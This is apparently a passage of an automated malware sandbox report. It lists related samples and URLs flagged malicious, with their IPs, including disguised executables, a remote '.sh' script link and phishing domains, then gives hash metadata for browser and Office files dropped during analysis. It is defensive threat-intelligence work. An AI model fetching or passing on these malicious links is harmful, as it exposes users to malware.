	AD_loc_cl-3528474.xls	Get hash	malicious	Browse	104.31.88.81
	AD_loc_cl-3528474.xls	Get hash	malicious	Browse	172.67.143.61
	https://blueslateherb.gq/a/ofc	Get hash	malicious	Browse	104.16.133.229
	http://41.33.13.26	Get hash	malicious	Browse	104.16.132.229
	http://evoltrade.fun/comments/cuttop.php	Get hash	malicious	Browse	54.164.243.243
	Purchase_Order_000A6230520.html	Get hash	malicious	Browse	104.19.143.111
	Financial Statement.HTML	Get hash	malicious	Browse	23.253.180.149
	http://new-evoltrade.fun/goods/task.php	Get hash	malicious	Browse	54.164.243.243
unknown	Datei 05.25.2020.doc	Get hash	malicious	Browse	91.215.169.248
	Datei 05.25.2020.doc	Get hash	malicious	Browse	91.215.169.248
	50dEFDImnl.exe	Get hash	malicious	Browse	77.88.21.158
	bonifico__8156.xls	Get hash	malicious	Browse	85.239.35.110
	Odeme makbuzu.exe	Get hash	malicious	Browse	77.88.21.158
	http://xia.vzboot.com/234.sh	Get hash	malicious	Browse	52.26.114.88
	bonifico__8156.xls	Get hash	malicious	Browse	85.239.35.110
	nPwbB.exe	Get hash	malicious	Browse	192.168.0.192
	https://u16340172.ct.sendgrid.net/ls/click?upn=lSGfpufETOVHbuao6v35fRtv1PVZ-2BRByXHtmX9nwqRpcyw6H79xas2IvMq1kw4ONTw-2Fvi-2F2Y2XrwK5kqYrhgUQ-3D-3Dcj0k_VdzTht8YAi698vJgaNLalENr4TvnC6UD-2FwZrCQlea78ysFkQl7sZeRl1uf-2B5cpVqELcmQ2uTq1Kq-2BzKt3AX-2F9-2FnN30JHTZOIHgCDAS-2F1kuwQcRmDgP9jNp9tBQIsX0VlQuIST1g7o4Bqkgr3o2sZmr337dzsuCa8t906xy0xZc6yy96Yy7BYLNj-2BcolZKM2Jrgm773yeBmwyT-2Fvn25-2FmzrwIArq2UXntfjB0Gz2OmUU-3D	Get hash	malicious	Browse	35.209.239.70
	Order.pdf.exe	Get hash	malicious	Browse	107.180.41.151
	6WqwIdpMM1.exe	Get hash	malicious	Browse	176.123.7.51
	https://rpmi.aspire.co/ucs/dl/micollab_pc.msi	Get hash	malicious	Browse	148.253.163.9
	AD_loc_cl-3528474.xls	Get hash	malicious	Browse	104.31.88.81
	AD_loc_cl-3528474.xls	Get hash	malicious	Browse	172.67.143.61
	https://blueslateherb.gq/a/ofc	Get hash	malicious	Browse	104.16.133.229
	http://41.33.13.26	Get hash	malicious	Browse	104.16.132.229
	http://evoltrade.fun/comments/cuttop.php	Get hash	malicious	Browse	54.164.243.243
	Purchase_Order_000A6230520.html	Get hash	malicious	Browse	104.19.143.111
	Financial Statement.HTML	Get hash	malicious	Browse	23.253.180.149
	http://new-evoltrade.fun/goods/task.php	Get hash	malicious	Browse	54.164.243.243

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{656409DF-9FF4-11EA-AAE0-C2DD1F0DAA95}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	29272
Entropy (8bit):	1.761923902474896
Encrypted:	false
MD5:	ED8A93FD72AE836F99E747499E5ABD57
SHA1:	0BCD997BE657631F56DBE528B078F0BD53A4499D
SHA-256:	D0D0909AE86031FFDF370E252126F57F7F7C1E9DA95E23933E1941D9EF21F69B
SHA-512:	EDA9E968EF055B1F65B3DD84B18EAB087EB4788B39F9DC706B6E4D1BD77A605144298739BD204BFD91AB0F110FE850E9F10B79CED4500FBB6D64626489595473
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{80478A8F-9FF4-11EA-AAE0-C2DD1F0DAA95}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	29272
Entropy (8bit):	1.7675948261494094
Encrypted:	false
MD5:	54A747B3B78D2CA0A590363F03617124
SHA1:	DF0DDB608EC69098CFAF7E7744749972709CE8E9
SHA-256:	653E31A76ED855712414EDEAA6BF8DDC1779370F0BE3EC2E23CF1187E6F35F07
SHA-512:	F5755705AEB9D13E5D0D8FAF287F1F7900BF0335B4A12CD18829FA9CF8EA714C35566DC0EEB6CF89023A901B6BD6266207C60FA70A65823C5B0C7F49EEF94BED
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8F89AC70-9FF4-11EA-AAE0-C2DD1F0DAA95}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	29272
Entropy (8bit):	1.7656050370006213
Encrypted:	false
MD5:	7ED01D454348CD954514C9FD64DF8D23
SHA1:	0916DDD4652F2195D56432683198DB7B434F45BD
SHA-256:	F89DEC049811BF71A5CCD944A510314FD5C136D1D9D109756EB74D5351465186
SHA-512:	9B6AEFE27B011C2C489BE5BAF97A36534D528B0E758888DAF9A75C58E7570C4B0B836D979BCFF31243200DF577210B817F205D9BF9AB451D859493712D019085
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{922D2B53-9FF4-11EA-AAE0-C2DD1F0DAA95}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	29272
Entropy (8bit):	1.7674654780392232
Encrypted:	false
MD5:	08C87CB40F8E206AB1B7C923CFC9D303
SHA1:	777F45CF67E547E940A45DEAA81FFCC4115E90AB
SHA-256:	C35E5FA9ECDB51391305D5D7EB3C49BA1B721AAAA724D92529993DC54130C432
SHA-512:	4EA67AA6309FF2132BF0659CEA36487B9EF530E684F7C2D66B4F6AED2D411DD4FC72090A1D89C994777F3B42A6DDB52186004E4679ACD8E1069F35E546B8406D
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{958691EA-9FF4-11EA-AAE0-C2DD1F0DAA95}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	29272
Entropy (8bit):	1.7658179678427575
Encrypted:	false
MD5:	95FF96D7D34BF0DE3F94891B365106D5
SHA1:	F08506FEC866E97A791E5CD3DA9F35764B9A8D13
SHA-256:	C4C377E5EB1CD40FC765CFEF9052A5D5651D03B84B1094848A3FCC7B03755FD7
SHA-512:	FCED32ECCC1F47893A4271057548F62673AF71F05546D97297987108FCB60C11D02B3575D36E74C58CCABE8E3243F77F736CA3B6B908ECC4175CD9C7DFF55285
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{656409E1-9FF4-11EA-AAE0-C2DD1F0DAA95}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	27268
Entropy (8bit):	1.807601035037408
Encrypted:	false
MD5:	B3FCAC625C92705AB45ED42E100EC739
SHA1:	BB5A51F0CFE476BCFC1BF81002F76254F30D9874
SHA-256:	2D99754032DFD46063B34041EF15834DA4F1C8EE28C7C857DA774C5C216A5E71
SHA-512:	369892D1D123A4F24835934FD5BAB30927679D1CE50AAD4D7D587F8DFA13BD5814FFD2428E0B34E11414E875F56D3DE8AE559D4CDAAA6CA07B4228ABAAF2C6EC
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{80478A91-9FF4-11EA-AAE0-C2DD1F0DAA95}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	27256
Entropy (8bit):	1.806119901726254
Encrypted:	false
MD5:	11DB4E0C6C8C48D1BFC5E19FA82E8E55
SHA1:	EA12C306A9A0362E4EB96F77E4A1739CE9CEE2EF
SHA-256:	E5EDAE685F24D7224833D74A865A7C45F5941805BC65D2394BCB8164C7CEC0EF
SHA-512:	5DAA3E8786C2A92B7321F113064AB7825C8128081F12D13792B75013CC5D5FC6CECF4C7E2BAB638209D49794F0AC045EDC3A514B5D0F67085F3C24C6A9A96A5E
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8F89AC72-9FF4-11EA-AAE0-C2DD1F0DAA95}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	27272
Entropy (8bit):	1.8089700851078503
Encrypted:	false
MD5:	86C904FE66FB136D4057AC9EEED2482E
SHA1:	A41CB666D9CC2CF480D668B92042E496E11ABB58
SHA-256:	86C6B32768FFFE91CEDFFE178E58D8DBBEEE3EDA1D16AB1D763AD417C1D7529D
SHA-512:	C30CBC494A0526B4E9A6309C4D74C1DD7EAD681629CEDE10D6569DE793417727C5EDC33049AC3B6CA88DE3FC6FAC1D106D8DA18A3EB9EA32CD19DCEF23E1B362
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{922D2B55-9FF4-11EA-AAE0-C2DD1F0DAA95}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	27264
Entropy (8bit):	1.8060534317645414
Encrypted:	false
MD5:	2C8B2D96D3EF2712F77F69912DEDFF98
SHA1:	178682B42C5B00E9B4D38590B79A69666E17A3AA
SHA-256:	310F62F27EFC80BBB3D7B309B8A1E7E6A6BAE9EFA75BB807FA997544D200B75D
SHA-512:	B1E1624874C1466A0DF5847D939D2BDD64F4363F027154BC46D673F572980B3C12935B06E45D0ADF2480471C72A447DDD3088021FB253D0F3E101B8CF5BFCEEA
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{958691EC-9FF4-11EA-AAE0-C2DD1F0DAA95}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	27796
Entropy (8bit):	1.8002834314732823
Encrypted:	false
MD5:	C4F31F03884B7D11D8600CFA4B3DEC21
SHA1:	1EAD2FCB9B24E1791C288F780E2530BAAE629D0B
SHA-256:	28BC65F9F293C2036353167F6568992154791AE428DBF8CC1BFD1CBBEB7A8D39
SHA-512:	1456900DBE27E99FEEC56D7317380941CF49968F0ADEE8CE8D7B85161526D1C51A3ACB4CCEB86D0A2F9C372B1FAAF4202E588143C6EAD4DC9DD9C5BBD68657C6
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes):	655
Entropy (8bit):	5.10988322109979
Encrypted:	false
MD5:	CE817623A0662F56C249545F3260EBF6
SHA1:	0EA64FFAFCEA636EB1F54A6AF5DA620A525DF192
SHA-256:	D895C15AD85D6E3CB6D89D4CA889168A00A160BD512487ABADF80CA4C6BCF2B1
SHA-512:	15277913D197ED87846AEADEC2F7EB2E00863BB4A3FC8DDCB02A74B798705A402717E506A401A5669E859CA10BCDF1B12396BF77181B5BAFA5A362FC0A3A292C
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x3be246f1,0x01d63401</date><accdate>0x3be246f1,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x3be246f1,0x01d63401</date><accdate>0x3be246f1,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes):	652
Entropy (8bit):	5.165244585819532
Encrypted:	false
MD5:	E4F3E86A04275EDA5CB325434D6445C6
SHA1:	9E5682FF236BC584E011E4CFE7EE47F3F34D80A4
SHA-256:	F93E40F4F9F12EE88FEFA0BA8B28E57D54114ED631B22655F79950A86B510F18
SHA-512:	AB0B04E21FE204E5DC30C54A6A29C3A2BB75B9D391678003E4FA7A613CC8B47E5296FC6D466FBEEDB22A0F0B40889B4D6D8E64DCC59AF424C3C90659882EF279
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x3bc89296,0x01d63401</date><accdate>0x3bc89296,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x3bc89296,0x01d63401</date><accdate>0x3bca369f,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes):	661
Entropy (8bit):	5.136461407113277
Encrypted:	false
MD5:	060D9558E9092857E41CF99AA2756C8A
SHA1:	3B46D299B9300B1FDC2493386CB46921CFAAB503
SHA-256:	98835BE34F97D8AAA1796B4B02F4F17AC54C4267F33ACA035E7806C7C13D5E6D
SHA-512:	7FBE053C7453FBBD09B23E2E3003CF6B94E72A0E0149F38508F4064CEF83AE4962B79D1DA8DB67ADEFB7E9A5EE9E30651A4F1E89A24548FC32FF86C086958C97
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x3be42747,0x01d63401</date><accdate>0x3be42747,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x3be42747,0x01d63401</date><accdate>0x3be57af3,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-314712940\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes):	409
Entropy (8bit):	5.162430414376256
Encrypted:	false
MD5:	FB9D9B6C71AFC6858249F1F6CD219483
SHA1:	5E9CE61A63BF0FE8D16147064D42BF62A12B6D23
SHA-256:	0A76111ABE88C64A4F9139283724AE3AA31415F909B3FE0A224656C284DB072F
SHA-512:	336ABB37AB18A5D58667E18B58B0CB170B72A2EC1423703675C932A283561F930BFBF627E08209E5A66954FD23A353124D0A5071EE6CB59DEF3A7F1FBD56EC4A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://go.microsoft.com/fwlink/p/?LinkId=255142"/><date>0xbb41d6e3,0x01d5fd35</date><accdate>0x3bcd7cf1,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Bing.url"/><selection>\lowres.png</selection></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes):	646
Entropy (8bit):	5.116569234619019
Encrypted:	false
MD5:	1CEE6E04CC5C70EDD67559E5C3E256F8
SHA1:	04BDFD147F14F20C204A21DC090AAD29C4256DEA
SHA-256:	37C8870606E3FC58D6D415B95B8EC4F677C168EF85A0F1C667D5E5605B31E850
SHA-512:	E379F6E558A097D3F05EAA90C91B7A72921F1F0D3674368C764833CF8F40C92D206215AF0256FFDD097BC94D07B3A98946828F9563AF6D0DAF857FCD6CB26510
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x3bd72dfd,0x01d63401</date><accdate>0x3bd72dfd,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x3bd72dfd,0x01d63401</date><accdate>0x3bd78cd7,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes):	655
Entropy (8bit):	5.130482989777821
Encrypted:	false
MD5:	3B8CD9AAE8A982413EE7B2C924E98C8A
SHA1:	F6598C07DFFF2382A0E0711DBB58F5F08F651C86
SHA-256:	15A830630C61C75CA6C95432AA5D80C03D2C355BC540977CFAA1FCB21733CC10
SHA-512:	DF234DC5F619A8C3FD084E744FBB03086300E502706263C14EE2821F4FD4DC84858DD072DCFC69FFBD8110973AADACC242B9540123791468D5B3CDA256EAEF9F
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x3be57af3,0x01d63401</date><accdate>0x3be57af3,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x3be57af3,0x01d63401</date><accdate>0x3be78d26,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes):	652
Entropy (8bit):	5.085377888359626
Encrypted:	false
MD5:	9F647F8CBB63D3550155D9EC929CE0C9
SHA1:	19FF2238B81BA2F4DC3B0FD79C907FCE189C7C9D
SHA-256:	8DD38E70432D08A14854F50400B19E8D6D8159F0C6FF41D33A707E24A37FB432
SHA-512:	4746562F760AE1BDE5258509412EECE7257D8A4502CE1C2D5F6C1B6E239126C75A6240FC0E0B018EF3AE2E26E711782979C7B440CEC38438EB3976EDB1CDCCF3
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x3bdeed5f,0x01d63401</date><accdate>0x3bdeed5f,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x3bdeed5f,0x01d63401</date><accdate>0x3be03e22,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes):	655
Entropy (8bit):	5.102368567141234
Encrypted:	false
MD5:	B2EC28DC81FA4B63C9265D12B100CBCC
SHA1:	036B427217D9F4319C787E3405BA7D03C5144377
SHA-256:	EDE02B1AF5CBE801C6D9480F63F312CF241D51877547DDC84569FA6D2B0E88BD
SHA-512:	AC6D14C7EA9AA3482572B5BF0F914BA48783592BB38F3D1C563B127B60671CD35F88BB6457E0932F1618CD196AF712A73649338921EA851259F95AAAA2094C72
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x3bdb0db0,0x01d63401</date><accdate>0x3bdb0db0,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x3bdb0db0,0x01d63401</date><accdate>0x3bdb0db0,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes):	658
Entropy (8bit):	5.08180073916336
Encrypted:	false
MD5:	47836EA27F5921D818F159ADBCD640FB
SHA1:	A17A9AF39B9E1FB7EE2B6F5B5DF40AB6CF41CC92
SHA-256:	CD7B3519C10F2FE3E58CA6C935918F8640BB0684C31A579BC84689A7AFAB8351
SHA-512:	565FAB394FAE4E450ED45F51B1F94E59179B2F9BE6AF52B93599A9E21D73908870531802AFAB74FBA3940737E998FD97242E6A04D1D992DCBD2F6E838B5246E3
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x3bcf1fa3,0x01d63401</date><accdate>0x3bcf1fa3,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x3bcf1fa3,0x01d63401</date><accdate>0x3bcf1fa3,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes):	652
Entropy (8bit):	5.103977047117244
Encrypted:	false
MD5:	A29BA8B1F803228A27E3F12824F0D5E6
SHA1:	DB0AA85AB7B5F7F2B5D5E72204E823FABCD8707B
SHA-256:	0D48F8D4C68A4C5499BEC373D7B57C4CD87163A94B1FBFCA47A1F5639E0EFE9E
SHA-512:	1BEC59998004E72D01FA0F10C4CADAB092A6BD7EB35C0B3E34CC627522C4C93459ADD59BF5CA346ADA4A9A39EE0C2204FAED1FE616EE28E1A41320532BE4C34D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x3bd27af1,0x01d63401</date><accdate>0x3bd27af1,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x3bd27af1,0x01d63401</date><accdate>0x3bd3c042,0x01d63401</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\7bm2vqu\imagestore.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Size (bytes):	5668
Entropy (8bit):	4.135013144040419
Encrypted:	false
MD5:	E99F7AF1E7048CE09CE290C1D05F719C
SHA1:	6304DDCDAD19D04BBB0B55F4652F93ACC5414635
SHA-256:	2E06B5B9DFB63E1F6661FDC6DFFF27210FA934E04592FBAE04A07D956B749720
SHA-512:	E862170914904BF40BDB7EA27A9AD971CC8486D18AF142F84DB6DD2BC1F52B1E3020EE846ED0E7811DA984460C1ADFE9EA17E9DD4E890437A08EB3C6F3E66EED
Malicious:	false
Preview:	'.h.t.t.p.:././.l.i.n.e...b.e.i.b.i.a.n.d.m.o.m...c.o.m./.f.a.v.i.c.o.n...i.c.o.~............... .h.......(....... ..... .....@.....................s...s...s...sw..r.......s...s...s...s.......s...s..s...s...s...s...r...s{..s...s#..s...s..r..s..s...s[..s...s...s..s...s...s...s}..s...sW..r..s...sm..sK..sC..sw..s..s...s%..s!..s..s...s...s...sU..s.sY..s...s..s..r#......s...s...s..s...r%..s[..s...s...s..s]..s...r.sS..s...sq..........s...s...s...s...s.......su..s...s.......s...s..s.sA..............s%..s..s#......r...r...s]..........s...s..sk..s...s...........s...s...s]......s...r..s7..........s...s..r...r...s...r...........s...s.......s...s..s7..........s...s..si..s?..s7..s...........s...s.......s...s...rW..........s...s..s...s...s...s...........s...s[..........ss..s...s.......s...s..sm..sI..s;..s.......s!..s..s#......s...s...s..sQ......s...s..s...r...sm..s...r...s...r...s...s...r...s...sQ..s..rK..s...sg..s'..........s...s...s..s...s'..s_..s...s...s...rQ..s..

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\CA81B430-28EB-47B8-A77D-45213F05C1CE Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	126597
Entropy (8bit):	5.378397290267413
Encrypted:	false
MD5:	E0FC23DC68CDA66F7E6FD453BBF1B1F9
SHA1:	AD64769E948ECD4879BFFEE6B2B95EAB7BC7B59D
SHA-256:	AA88F54ADCC5DEFD36DE7FCC8B0F3512295DADA68E6B3B533A051AC2D4AF3935
SHA-512:	E4165CF404022CB91464B0DDA8ED3780F1E63024841821F4C106F13DF13089176803A8EC362CB0E3E21862F3672275CBB12751A2CC37A94C9641D54F7444827D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-05-27T08:30:25">.. Build: 16.0.12920.30533-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	XML 1.0 document, ASCII text, with very long lines, with no line terminators
Size (bytes):	412027
Entropy (8bit):	5.105190603444391
Encrypted:	false
MD5:	5F2A0C5CE21462BA3620A02E887FE38F
SHA1:	F55BE2197E8A76192D29AE68D0E25BAD8BF144E1
SHA-256:	F1E6977EE28764F50918828603EBD1CE27A4151349DEB6099C269447D950DB57
